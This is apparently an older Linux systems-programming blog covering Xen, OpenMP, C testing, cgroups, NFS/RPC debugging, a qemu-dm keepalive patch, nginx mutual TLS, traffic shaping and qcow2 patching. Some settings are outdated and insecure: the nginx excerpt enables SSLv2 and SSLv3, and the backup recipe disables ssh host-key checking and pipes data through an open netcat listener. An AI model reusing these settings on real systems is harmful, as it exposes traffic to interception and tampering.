/vm/00000000-0000-0000-0000-000000000000/on_xend_stop=ignore /vm/00000000-0000-0000-0000-000000000000/shadow_memory=0 /vm/00000000-0000-0000-0000-000000000000/uuid=00000000-0000-0000-0000-000000000000 /vm/00000000-0000-0000-0000-000000000000/on_reboot=restart /vm/00000000-0000-0000-0000-000000000000/image/ostype=linux /vm/00000000-0000-0000-0000-000000000000/image/kernel= /vm/00000000-0000-0000-0000-000000000000/image/cmdline= /vm/00000000-0000-0000-0000-000000000000/image/ramdisk= /vm/00000000-0000-0000-0000-000000000000/on_poweroff=destroy /vm/00000000-0000-0000-0000-000000000000/bootloader_args= /vm/00000000-0000-0000-0000-000000000000/on_xend_start=ignore /vm/00000000-0000-0000-0000-000000000000/on_crash=restart /vm/00000000-0000-0000-0000-000000000000/xend/restart_count=0 /vm/00000000-0000-0000-0000-000000000000/vcpus=4 /vm/00000000-0000-0000-0000-000000000000/vcpu_avail=15 /vm/00000000-0000-0000-0000-000000000000/bootloader= /vm/00000000-0000-0000-0000-000000000000/name=Domain-0 /vm/00000000-0000-0000-0000-000000000000/memory=2796 /local/domain/0/vm=/vm/00000000-0000-0000-0000-000000000000 /local/domain/0/device= /local/domain/0/control/platform-feature-multiprocessor-suspend=1 /local/domain/0/error= /local/domain/0/memory/target=2863104 /local/domain/0/guest= /local/domain/0/hvmpv= /local/domain/0/cpu/1/availability=online /local/domain/0/cpu/3/availability=online /local/domain/0/cpu/2/availability=online /local/domain/0/cpu/0/availability=online /local/domain/0/name=Domain-0 /local/domain/0/console/limit=1048576 /local/domain/0/console/type=xenconsoled /local/domain/0/domid=0 /local/domain/0/device-model= /tool/xenstored=
Xenoprof, Xen profiling
Xenoprof is a system-wide profiler for Xen virtual machine environments, capable of profiling the Xen virtual machine monitor, multiple Linux guest operating systems, and applications running on them. (http://xenoprof.sourceforge.net/)A little bit outdated but still useful Xenoprof overview & Networking Performance Analysis.
SMP as easy as you cannot imagine
In contrast to MPP, where MPI is the standard, in the world of SMP pthreads are the de facto standard way to make your program execute in parallel. But there is another standard: OpenMP.
test_parallel.c
#include <stdio.h>
#include <unistd.h>
#ifdef _OPENMP
#include <omp.h>
#else
#define omp_get_thread_num() 0
#endif

int main(int argc, char **argv)
{
    int n = 10;
    int i;
    #pragma omp parallel
    {
        printf("thread %d\n", omp_get_thread_num());
        #pragma omp for
        for (i = 1; i <= n; i++) {
            sleep(1);
        }
    }
    return 0;
}
Test
gcc test_parallel.c
time ./a.out
thread 0
real 0m10.002s
user 0m0.000s
sys 0m0.001s
Enable OpenMP
gcc -fopenmp test_parallel.c
time ./a.out
thread 3
thread 7
thread 0
thread 4
thread 1
thread 5
thread 6
thread 2
real 0m2.002s
user 0m0.009s
sys 0m0.004s
Smoke and unit tests for C
Take a look at the vstr library source code. It is a de facto standard for implementing tests in C without any additional tools like googletest. See below what to do if you do not want to add one more tool to your project but still need tests.
tst_main.c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include "backup_app.h"
#include "tst.h"

int main(int argc, char **argv)
{
    DBHOST = "127.0.0.1";
    DBUSER = "root";
    DBDB = "???";
    DBPORT = 3306;
    return tst();
}

/*--------------------------------------------------- mocks */
int snmp_log(int priority, const char *format, ...)
{
    va_list ap;
    va_start(ap, format);
    if (vfprintf(stderr, format, ap) < 0)
        goto error;
    va_end(ap);
    return 0;
error:
    va_end(ap);
    return 1;
}
One of the tests, tst_cmd_ok.c
#include <stdlib.h>
#include "extern_cmd.h"
#include "tst.h"

int tst()
{
    int ret;
    char *args[] = {"/bin/ls", "-l", NULL};
    char *res = mb_cmd_exec(args, NULL);
    ret = (res) ? SUCCESS : FAILED;
    free(res);
    return ret;
}
Makefile
.PHONY: clean
CC=gcc
CFLAGS=-g -Wall -I..
LDFLAGS=-Wl,--unresolved-symbols=ignore-all
HEADERS=$(wildcard ../*.h)
OBJECTS=$(patsubst %.c,%.o,$(wildcard *.c))
TO_TEST_OBJECTS=$(patsubst %.c,%.o,$(wildcard ../*.c))
MAIN_TST_OBJ=tst_main.o
BUILDLIBS=-lmysqlclient_r -lpthread
_TESTS=$(patsubst %.c,%,$(wildcard *.c))
TESTS=$(patsubst tst_main,,$(_TESTS))

all: $(OBJECTS) $(TESTS)

%.o: %.c $(HEADERS)
	$(CC) $(CFLAGS) -c $<

$(TESTS): $(TO_TEST_OBJECTS) $(MAIN_TST_OBJ) $(OBJECTS)
	$(CC) $(CFLAGS) $(LDFLAGS) $(patsubst %,%.o,$@) $(TO_TEST_OBJECTS) $(MAIN_TST_OBJ) -o $@ $(BUILDLIBS)

clean:
	rm -f *~ *.o $(TESTS)
Note LDFLAGS=-Wl,--unresolved-symbols=ignore-all: it tells the linker to ignore unresolved symbols, so each test binary links even though it does not pull in every dependency of the objects under test.
Script to start tests test.sh
#!/bin/sh
for result in `find . -maxdepth 1 -perm /u=x,g=x,o=x -type f -name 'tst_*'`; do
    $result
    exit_st=$?
    if [ $exit_st -eq 0 ]
    then
        echo $result : ok
    else
        echo $result : failed
    fi
done
Simplistic ORM like thing in C for MySQL
Take a look at extern_mysql.h and extern_mysql.c. It is a simple result-set-to-struct mapping done in C for MySQL 5.0 and above for one of the projects. libmysql_r is not the simplest thing to work with; the code provided was tested in production, so it works. Take a look if you are having a bad day and are forced to get data from MySQL in C.
A few words about an interface. To get data from mysql:
1) add request to mb_mysql_stmt:
mb_mysql_stmt_t mb_mysql_stmt[] = {
    ...
    { "select * from SCHEDULE", NULL, NULL, sizeof(mb_db_schedule_t), bind_r_schedule },
    ...
};
where bind_r_schedule is a binding definition:
mb_bind_t bind_r_schedule[] = {
    {"schedule_id", offsetof(mb_db_schedule_t, schedule_id), sizeof(((mb_db_schedule_t*)0)->schedule_id), 0},
    {"name", offsetof(mb_db_schedule_t, name), sizeof(((mb_db_schedule_t*)0)->name), 0},
    {"schedule_type", offsetof(mb_db_schedule_t, schedule_type), sizeof(((mb_db_schedule_t*)0)->schedule_type), 0},
    {"enabled", offsetof(mb_db_schedule_t, enabled), sizeof(((mb_db_schedule_t*)0)->enabled), 0},
    {"last_backup", offsetof(mb_db_schedule_t, last_backup), sizeof(((mb_db_schedule_t*)0)->last_backup), 0},
    {NULL, 0, 0, 0}
};
This means that mb_db_exec() will return an array of mb_db_schedule_t; each element of the array corresponds to one row in the result set. Bindings are used to map fields of the result set to struct members; consult C API Prepared Statement Type Codes to map mysql types to C ones (for MYSQL_TIME, mb_time_t is defined). The length of the array is stored in the variable pointed to by the count argument of the mb_db_exec() function.
If you want to get single value from db you can use, for instance
mb_bind_t bind_r_config_value[] = {
    {"value", 0, 256, 0},
    {NULL, 0, 0, 0}
};

mb_mysql_stmt_t mb_mysql_stmt[] = {
    ...
    { "select value from CONFIG where `key`='address'", NULL, NULL, 256, bind_r_config_value },
    ...
};
Here we do not use a struct but map the whole row to a buffer of 256 bytes (256 is the max length of the value field in the config table). To obtain results, call
char *data;
data = mb_db_exec(mb_db_ip_address_stmt, NULL);
if (!data)
    mb_log_err("cannot find ip address");
Note that we do not need count here. Also note that bindings can be reused (bind_r_config_value can be used to obtain various values from the config table).
2) add request number to mb_db_stmt_e enum:
typedef enum {
    ...
    mb_db_ip_address_stmt
} mb_db_stmt_e;
Cgroups, limit memory
If some application may eat a lot of memory and cause swapping, you can put it into a sandbox
Test app memtest.c
#include <stdlib.h>
#include <stdio.h>

int main()
{
    int i;
    void *p;
    p = NULL;
    for (i = 0; 1; i += 4096) {
        p = malloc(4096);
        if (!p) {
            perror("malloc");
            break;
        }
        printf("allocated %d bytes\n", i);
    }
}
Create a new group and add the current shell process to it
mkdir /sys/fs/cgroup/memory/0
echo $$ > /sys/fs/cgroup/memory/0/tasks
Configure memory limit
echo 4M > /sys/fs/cgroup/memory/0/memory.limit_in_bytes
Test
gcc memtest.c
./a.out
...
allocated 3997696 bytes
Killed
As you noticed, malloc didn't return NULL: the app received a signal and was terminated, because swap is not used and the kernel kills one of the processes when there is not enough free memory left.
Prepare sparse raw image with ntfs
Create sparse file
dd if=/dev/zero of=test.img bs=1 count=0 seek=1995G
0+0 records in
0+0 records out
0 bytes (0 B) copied, 1.1611e-05 s, 0.0 kB/s
Create partition table
echo 'n p 1 t 7 w ' | /sbin/fdisk -u test.img Device contains neither a valid DOS partition table, nor Sun, SGI or OSF disklabel Building a new DOS disklabel with disk identifier 0x2cddb521. Changes will remain in memory only, until you decide to write them. After that, of course, the previous content won't be recoverable. Warning: invalid flag 0x0000 of partition table 4 will be corrected by w(rite) Command (m for help): Partition type: p primary (0 primary, 0 extended, 4 free) e extended Select (default p): Partition number (1-4, default 1): First sector (2048-4183818239, default 2048): Using default value 2048 Last sector, +sectors or +size{K,M,G} (2048-4183818239, default 4183818239): Using default value 4183818239 Command (m for help): Selected partition 1 Hex code (type L to list codes): Changed system type of partition 1 to 7 (HPFS/NTFS/exFAT) Command (m for help): The partition table has been altered! Syncing disks.
Format first partition
/sbin/kpartx -a test.img
/usr/sbin/mkntfs -c4096 -s512 -p63 -H255 -S63 -Ff --label Drive_E /dev/mapper/loop0p1
/sbin/kpartx -d test.img
loop deleted : /dev/loop0
Mount/umount first partition
/sbin/kpartx -a test.img mkdir exposed /usr/bin/ntfs-3g -o rw,noatime,force,entry_timeout=60000,negative_timeout=60000,attr_timeout=60000,ac_attr_timeout=60000 /dev/mapper/loop0p1 exposed ... umount exposed /sbin/kpartx -d test.img loop deleted : /dev/loop0
How to debug Sun RPC
I bet you are used to debugging web services via some sniffer like wireshark. This is possible because of protocol simplicity (yes, even if it is SOAP with attachments, it is still a simple text, xml based protocol).
Sun RPC is a rather popular IPC mechanism on Linux; by its nature it resembles Java RMI. Sun RPC is complex, binary, and uses multiple connections. In brief, there is an rpcbind daemon (a portmapper, in other words) that serves as a registry of services: a client asks rpcbind for the port of a specific service and then connects directly to the service. For instance, NFS is built around Sun RPC; nfs-server uses port 2049 by default, but it can be registered on any other port and clients can still find it via the registry (nfs-utils prior to 1.2 has port 2049 hardcoded, though).
So how to deal with this if you hit some trouble? There is an rpcdebug util
The rpcdebug command allows an administrator to set and clear the Linux kernel's NFS client and server debug flags. Setting these flags causes the kernel to emit messages to the system log in response to NFS activity; this is typically useful when debugging NFS problems.
rpcdebug -vh
usage: rpcdebug [-v] [-h] [-m module] [-s flags...|-c flags...]
       set or cancel debug flags.
Module     Valid flags
rpc        xprt call debug nfs auth bind sched trans svcsock svcdsp misc cache all
nfs        vfs dircache lookupcache pagecache proc xdr file root callback client mount all
nfsd       sock fh export svc proc fileop auth repcache xdr lockd all
nlm        svc client clntlock svclock monitor clntsubs svcsubs hostcache xdr all

rpcdebug -m rpc -s all
rpc xprt call debug nfs auth bind sched trans svcsock svcdsp misc cache
See /var/log/syslog
... Jan 6 13:40:58 HDC05 kernel: [1430624.387439] RPC: set up transport to address addr=10.1.2.11 port=48355 proto=udp Jan 6 13:40:58 HDC05 kernel: [1430624.387533] RPC: created transport ffff88000eb2c000 with 16 slots Jan 6 13:40:58 HDC05 kernel: [1430624.387588] RPC: creating mount client for db01 (xprt ffff88000eb2c000) Jan 6 13:40:58 HDC05 kernel: [1430624.387672] RPC: creating UNIX authenticator for client ffff88002f863200 Jan 6 13:40:58 HDC05 kernel: [1430624.389041] RPC: 0 holding NULL cred ffffffffa0118da0 Jan 6 13:40:58 HDC05 kernel: [1430624.389091] RPC: new task initialized, procpid 21435 Jan 6 13:40:58 HDC05 kernel: [1430624.389142] RPC: allocated task ffff88002b3fe1c0 Jan 6 13:40:58 HDC05 kernel: [1430624.389192] RPC: 850 __rpc_execute flags=0x280 Jan 6 13:40:58 HDC05 kernel: [1430624.389240] RPC: 850 call_start mount3 proc NULL (sync) Jan 6 13:40:58 HDC05 kernel: [1430624.389290] RPC: 850 call_reserve (status 0) ...
Xen VNC and stale tcp connections
The problem: if the vnc client terminates without sending a packet with the FIN/RST flag (for instance, the VNC connection was tunneled through a VPN and the tunnel was closed), the connection on the server side remains in the ESTABLISHED state and one cannot connect to this VM via VNC again, see vnc stops working after a while.
The solution to this simple problem is a bit involved. First of all, tcp keepalive should be turned on on the vnc server socket; in other words, one must patch qemu-dm, which implements VNC in Xen (Xen Opensource 3.4.2).
diff -u -x '*.o' -x '*.o.d' xen-3.4.2/tools/ioemu-qemu-xen/osdep.c xen-3.4.2_fix/tools/ioemu-qemu-xen/osdep.c --- xen-3.4.2/tools/ioemu-qemu-xen/osdep.c 2009-11-05 11:44:56.000000000 +0000 +++ xen-3.4.2_fix/tools/ioemu-qemu-xen/osdep.c 2011-12-28 13:43:29.938649747 +0000 @@ -338,4 +338,11 @@ f = fcntl(fd, F_GETFL); fcntl(fd, F_SETFL, f | O_NONBLOCK); } + +int socket_set_keepalive(int fd) { + int optval; + + optval = 1; + return setsockopt(fd, SOL_SOCKET, SO_KEEPALIVE, &optval, sizeof(optval)); +} #endif diff -u -x '*.o' -x '*.o.d' xen-3.4.2/tools/ioemu-qemu-xen/qemu_socket.h xen-3.4.2_fix/tools/ioemu-qemu-xen/qemu_socket.h --- xen-3.4.2/tools/ioemu-qemu-xen/qemu_socket.h 2009-11-05 11:44:56.000000000 +0000 +++ xen-3.4.2_fix/tools/ioemu-qemu-xen/qemu_socket.h 2011-12-28 13:43:32.788255661 +0000 @@ -41,6 +41,7 @@ /* misc helpers */ void socket_set_nonblock(int fd); +int socket_set_keepalive(int fd); int send_all(int fd, const void *buf, int len1); /* New, ipv6-ready socket helper functions, see qemu-sockets.c */ diff -u -x '*.o' -x '*.o.d' xen-3.4.2/tools/ioemu-qemu-xen/vnc.c xen-3.4.2_fix/tools/ioemu-qemu-xen/vnc.c --- xen-3.4.2/tools/ioemu-qemu-xen/vnc.c 2009-11-05 11:44:56.000000000 +0000 +++ xen-3.4.2_fix/tools/ioemu-qemu-xen/vnc.c 2011-12-28 13:44:59.283974757 +0000 @@ -2389,6 +2389,8 @@ VNC_DEBUG("New client on socket %d\n", vs->csock); dcl->idle = 0; socket_set_nonblock(vs->csock); + if (socket_set_keepalive(vs->csock) == -1) + VNC_DEBUG("Cannot set KEEPALIVE on socket %d\n", vs->csock); qemu_set_fd_handler2(vs->csock, NULL, vnc_client_read, NULL, opaque); vnc_write(vs, "RFB 003.008\n", 12); vnc_flush(vs);Recompile xen tools (make tools, see xen README) and replace qemu-dm executable with dist/install/usr/lib64/xen/bin/qemu-dm.
Configure linux kernel
HDC11:~# sysctl -a | grep ipv4.tcp_keep
net.ipv4.tcp_keepalive_time = 30
net.ipv4.tcp_keepalive_probes = 5
net.ipv4.tcp_keepalive_intvl = 10
This means: if there are no packets for 30 secs, send an empty probe packet; if no ACK is received, send up to 5 probes every 10 secs; if there is still no answer, send RST and close the connection.
Test
HDC11:~# netstat -nap | grep 5901 tcp 0 0 0.0.0.0:5901 0.0.0.0:* LISTEN 28905/qemu-dm HDC11:~# netstat -nap | grep 5901 tcp 0 0 0.0.0.0:5901 0.0.0.0:* LISTEN 28905/qemu-dm tcp 0 0 10.10.17.11:5901 10.10.17.216:1334 ESTABLISHED 28905/qemu-dm <---- VNC connection via VPN HDC11:~# tcpdump -n -i eth2 port 1334 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth2, link-type EN10MB (Ethernet), capture size 96 bytes 07:42:15.119612 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1601431976 win 5840 07:42:15.316704 IP 10.10.17.216.1334 > 10.10.17.11.5901: . ack 1 win 64228 07:42:45.319980 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840 <--- acks every 30 secs 07:42:45.701610 IP 10.10.17.216.1334 > 10.10.17.11.5901: . ack 1 win 64228 <--- response to ack 07:43:15.700307 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840 <--- kill vpn, no response anymore 07:43:25.700398 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840 07:43:35.700586 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840 07:43:45.700639 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840 07:43:55.700765 IP 10.10.17.11.5901 > 10.10.17.216.1334: . ack 1 win 5840 <--- 5 probes every 10 secs 07:44:05.700913 IP 10.10.17.11.5901 > 10.10.17.216.1334: R 1:1(0) ack 1 win 5840 <--- still no response, RST ^C 10 packets captured 10 packets received by filter 0 packets dropped by kernel HDC11:~# netstat -nap | grep 5901 tcp 0 0 0.0.0.0:5901 0.0.0.0:* LISTEN 28905/qemu-dm <--- no ESTABLISHED connections HDC11:~# telnet localhost 5901 <--- we can connect to this port again Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. RFB 003.008 <--- server responds ^] telnet> quitBut we need to go deeper. Tcp keepalive works only when there are no packets on the wire. Imagine VNC server sent some packet and connection terminated in silent way (i.e. it didn't receive ACK in his packet). In this case linux will try to resend packet until RTO.
07:57:36.123013 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1557:1598(41) ack 377 win 5840 07:57:36.317922 IP 10.10.17.216.1421 > 10.10.17.11.5901: P 377:387(10) ack 1598 win 63353 <--- here we lost connection 07:57:36.360862 IP 10.10.17.11.5901 > 10.10.17.216.1421: . ack 387 win 5840 07:58:06.317741 IP 10.10.17.11.5901 > 10.10.17.216.1421: . ack 387 win 5840 07:58:16.321445 IP 10.10.17.11.5901 > 10.10.17.216.1421: . ack 387 win 5840 07:58:16.932260 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 <--- vnc server (qemu-dm) tries to send some data 07:58:17.621451 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 <--- retransmit algorithm starts with dynamic growing intervals 07:58:19.001467 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 07:58:21.761500 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 07:58:27.281590 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 07:58:38.321648 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 07:59:00.401919 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 07:59:44.562552 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 08:01:12.883584 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 08:03:12.885069 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 08:05:12.886487 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 08:07:12.887861 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 08:09:12.889364 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 08:11:12.890812 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 08:13:12.892282 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 08:15:12.893702 IP 10.10.17.11.5901 > 10.10.17.216.1421: P 1598:1617(19) ack 387 win 5840 <--- ok, 
now reno gives up, connection is closed after ~15 mins
HDC11:~# netstat -nap | grep 5901
tcp 0 0 0.0.0.0:5901 0.0.0.0:* LISTEN 28905/qemu-dm
15 mins without the ability to connect to a VM is too long for a client. Configure the kernel again: decrease /proc/sys/net/ipv4/tcp_retries2 (net.ipv4.tcp_retries2) from 15 to 5 tries.
09:05:45.286580 IP 10.10.17.216.1312 > 10.10.17.11.5901: P 84:94(10) ack 3649 win 63679
09:05:45.320669 IP 10.10.17.11.5901 > 10.10.17.216.1312: . ack 94 win 5840
09:06:15.281030 IP 10.10.17.11.5901 > 10.10.17.216.1312: . ack 94 win 5840
09:06:25.281213 IP 10.10.17.11.5901 > 10.10.17.216.1312: . ack 94 win 5840
09:06:25.961866 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840
09:06:26.661261 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840
09:06:28.061265 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840
09:06:30.861301 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840
09:06:36.461346 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840
09:06:47.661424 IP 10.10.17.11.5901 > 10.10.17.216.1312: P 3649:3668(19) ack 94 win 5840
~60-90 secs
As a result one can re-establish a connection to VNC in 1-2 mins.
Note, one can kill stale connections with the help of netfilter by setting conntrack net.netfilter.nf_conntrack_tcp_timeout_established to 1-2 hours (the default is 5 days). After this time elapses iptables will send RST in both directions. But one still needs to set a proper net.ipv4.tcp_retries2.
Nginx, two-way ssl authentication
See Mutual authentication or two-way authentication.
- Client has X509 cert and private key.
- Server has its own cert and key and client cert.
- At connection establishment time the server checks the client cert and the client checks the server cert. The server also knows the client name after auth.
openssl genpkey -algorithm RSA -out cert.key
openssl req -new -x509 -key cert.key -out cert.pem
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (eg, YOUR name) []:localhost
Email Address []:
Note, Common Name must be equal to the domain name.
Nginx config excerpt
server {
    listen 443;
    server_name localhost;
    ssl on;
    ssl_certificate cert.pem;
    ssl_certificate_key cert.key;
    ssl_session_timeout 5m;
    ssl_protocols SSLv2 SSLv3 TLSv1;
    ssl_ciphers HIGH:!aNULL:!MD5;
    ssl_prefer_server_ciphers on;
    location / {
        root html;
        index index.html index.htm;
    }
}
Test
curl -k -i https://localhost/ HTTP/1.1 200 OK Server: nginx/1.1.11 Date: Fri, 16 Dec 2011 11:56:28 GMT Content-Type: text/html Content-Length: 151 Last-Modified: Fri, 16 Dec 2011 10:49:22 GMT Connection: keep-alive Accept-Ranges: bytes <html> <head> <title>Welcome to nginx!</title> </head> <body bgcolor="white" text="black"> <center><h1>Welcome to nginx!</h1></center> </body> </html>The -k parameter must be specified because server cert is self-signed, see curl(1).
-k/--insecure
(SSL) This option explicitly allows curl to perform "insecure" SSL connections and transfers. All SSL connections are attempted to be made secure by using the CA certificate bundle installed by default. This makes all connections considered "insecure" fail unless -k/--insecure is used.
This was one-way ssl. Add the following lines to the config to require a client cert
server {
    ...
    ssl_verify_client on;
    ssl_client_certificate client.pem;
    ...
}
Test
curl -k -i https://localhost/ HTTP/1.1 400 Bad Request Server: nginx/1.1.11 Date: Fri, 16 Dec 2011 12:09:38 GMT Content-Type: text/html Content-Length: 253 Connection: close <html> <head><title>400 No required SSL certificate was sent</title></head> <body bgcolor="white"> <center><h1>400 Bad Request</h1></center> <center>No required SSL certificate was sent</center> <hr><center>nginx/1.1.11</center> </body> </html> curl -k -i --cert cert.pem --key cert.key https://localhost/ HTTP/1.1 200 OK Server: nginx/1.1.11 Date: Fri, 16 Dec 2011 12:01:56 GMT Content-Type: text/html Content-Length: 151 Last-Modified: Fri, 16 Dec 2011 10:49:22 GMT Connection: keep-alive Accept-Ranges: bytes <html> <head> <title>Welcome to nginx!</title> </head> <body bgcolor="white" text="black"> <center><h1>Welcome to nginx!</h1></center> </body> </html>User agents (google-chrome, firefox, others) often use PKCS#12 format (files with .p12 extension). One can convert pair cert.pem/cert.key into PKCS#12 via openssl
openssl pkcs12 -export -in cert.pem -inkey cert.key -out cert.p12
Then import cert.p12 into the browser and go to https://localhost/. Note: use certificate chains, with one certificate as the root for all client certs; nginx will authenticate clients against this root certificate.
Monday, December 23, 2013
Debug and profile erlang linked in driver
OTP tools like fprof refuse to profile your .so (for a good reason). So how to do this?
erl, like any other executable, loads a linked-in driver as a shared library, and one can introspect this shared library like any other. At compilation time one needs to add debug info to the .so file (the -ggdb flag for gcc), then attach to the running Erlang virtual machine from gdb, kdbg, or similar.
> ps ax | grep erlang
9801 pts/1 Sl+ 0:00 /usr/lib64/erlang/erts-5.8.1/bin/beam.smp -K true -- -root /usr/lib64/erlang -progname erl -- -home /home/adolgarev --
11208 pts/0 S+ 0:00 grep erlang
> kdbg -p 9801 /usr/lib64/erlang/erts-5.8.1/bin/beam.smp
Now breakpoints can be added and program state inspected
To profile do the following
valgrind --tool=callgrind --trace-children=yes /usr/bin/erl
Run tests, grab callgrind.out.PID, open it in kcachegrind
In this particular example you can see that list creation via cons (|) is really slow (the ei_x_encode_list_header procedure). Knowing the list size beforehand decreases the caller's relative execution time from 34.45% to 23.25%.
Note that profiling here is not a sign of premature optimization but a sanity check that you are not doing something insane.
How to limit network bandwidth and introduce latency
So you want to test how clients of some service (nfs, say) behave when the network or the service is slow. In order to do this you need to limit network throughput and introduce latency and jitter (latency variation). Ok, I bet you know how to do this
tc qdisc add dev eth0 root handle 1: prio
tc qdisc add dev eth0 parent 1:3 handle 30: tbf rate 1mbit buffer 10kb limit 3000
tc qdisc add dev eth0 parent 30:1 handle 31: netem delay 100ms 10ms distribution normal
tc filter add dev eth0 protocol ip parent 1:0 prio 3 u32 match ip dst 192.168.44.4/32 flowid 1:3
See Linux Advanced Routing & Traffic Control HOWTO.
Simple test. On server side
iperf -s
------------------------------------------------------------
Server listening on TCP port 5001
TCP window size: 85.3 KByte (default)
------------------------------------------------------------
[  4] local 192.168.44.4 port 5001 connected with 192.168.44.26 port 37494
[ ID] Interval       Transfer     Bandwidth
[  4]  0.0-14.6 sec  1.52 MBytes  870 Kbits/sec
On client side
iperf -c 192.168.44.4
------------------------------------------------------------
Client connecting to 192.168.44.4, TCP port 5001
TCP window size: 16.0 KByte (default)
------------------------------------------------------------
[  3] local 192.168.44.26 port 37494 connected with 192.168.44.4 port 5001
[ ID] Interval       Transfer     Bandwidth
[  3]  0.0-11.8 sec  1.52 MBytes  1.08 Mbits/sec
Cleanup
tc qdisc del dev eth0 root
How to backup sparse file over network
Rsync will drive the CPU or IO crazy. One needs to use fs-specific utils to perform this kind of task. For instance, for XFS one can use xfsdump and xfsrestore via an ssh tunnel
/usr/bin/ssh -o 'UserKnownHostsFile /dev/null' -o 'StrictHostKeyChecking no' -o 'ExitOnForwardFailure yes' -L1234:localhost:1234 test@192.168.14.189 'netcat -l -v -p 1234 | /sbin/xfsrestore - /home/bckp'
Restore Status: SUCCESS
/sbin/xfsdump -s /a/b/c -F - /home | netcat localhost 1234
Dump Status: SUCCESS
Things to note.
- ssh options 'UserKnownHostsFile /dev/null' and 'StrictHostKeyChecking no' omit the known_hosts check, see ssh_config(5).
- ssh option 'ExitOnForwardFailure yes' forces ssh to exit with error if it failed to forward ports.
- be careful with netcat: there are two different netcat implementations with incompatible CLIs.
- see xfsdump(8) and xfsrestore(8).
How to change path to backing file in qcow2
Standard utilities cannot do this. Take C and the qcow2 image format doc and write something like
#define ntohll(x) (((uint64_t)(ntohl((uint32_t)((x << 32) >> 32))) << 32) | \
                   ntohl(((uint32_t)(x >> 32))))

/* change filename in qcow2 */
int backing_file_patch(const char *in_file, const char *new_backing_file)
{
    int f;
    uint64_t backing_file_offset;
    uint32_t backing_file_size;

    if ((f = open(in_file, O_RDWR)) == -1) {
        perror("open");
        goto error;
    }
    if (lseek(f, 8, SEEK_SET) == (off_t)-1) {
        perror("lseek");
        goto error;
    }
    if (read(f, &backing_file_offset, sizeof(backing_file_offset)) == -1) {
        perror("read");
        goto error;
    }
    backing_file_offset = ntohll(backing_file_offset);
    backing_file_size = strlen(new_backing_file);
    backing_file_size = htonl(backing_file_size);
    /* update backing_file_size */
    if (write(f, &backing_file_size, sizeof(backing_file_size)) == -1) {
        perror("write");
        goto error;
    }
    /* update path */
    if (lseek(f, backing_file_offset, SEEK_SET) == (off_t)-1) {
        perror("lseek");
        goto error;
    }
    if (write(f, new_backing_file, strlen(new_backing_file)) == -1) {
        perror("write");
        goto error;
    }
    close(f);
    return 0;

error:
    close(f);
    return 1;
}

To test this
/usr/sbin/xm block-attach 0 tap:qcow2:/home/test/vm_drive_C_snapshot.qcow2 /dev/xvda w 0
/bin/ntfs-3g -o dev_offset=7340032,rw,noatime,force,entry_timeout=60000,negative_timeout=60000,attr_timeout=60000,ac_attr_timeout=60000 /dev/xvda exposed

Cleanup
/bin/umount exposed
/usr/sbin/xm block-detach 0 51712
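For comparison, the same header surgery can be sketched in Python with struct. This is my own sketch, with the same caveat as the C version: it assumes the new path fits into the space originally reserved for it in the image.

```python
import struct

def patch_backing_file(path, new_backing):
    # qcow2 header fields are big-endian: a u64 at offset 8 holds
    # backing_file_offset (where the path is stored), a u32 at
    # offset 16 holds backing_file_size (length of the path).
    with open(path, "r+b") as f:
        f.seek(8)
        (backing_file_offset,) = struct.unpack(">Q", f.read(8))
        f.seek(16)
        f.write(struct.pack(">I", len(new_backing)))
        f.seek(backing_file_offset)
        f.write(new_backing.encode())
```

Like the C code, it overwrites the length field and the path bytes in place and nothing else.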
Sunday, December 22, 2013
Don't parse output from system utilities
One often sees that some system utility returns the information one needs. Then one does the wrong thing: parses the output of this utility. We'll do the opposite. For instance, we'll get the broadcast address
/sbin/ifconfig eth1
eth1      Link encap:Ethernet  HWaddr 00:0A:CD:14:CD:77
          inet addr:192.168.44.177  Bcast:192.168.44.255  Mask:255.255.255.0
          inet6 addr: fe80::20a:cdff:fe14:cd77/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
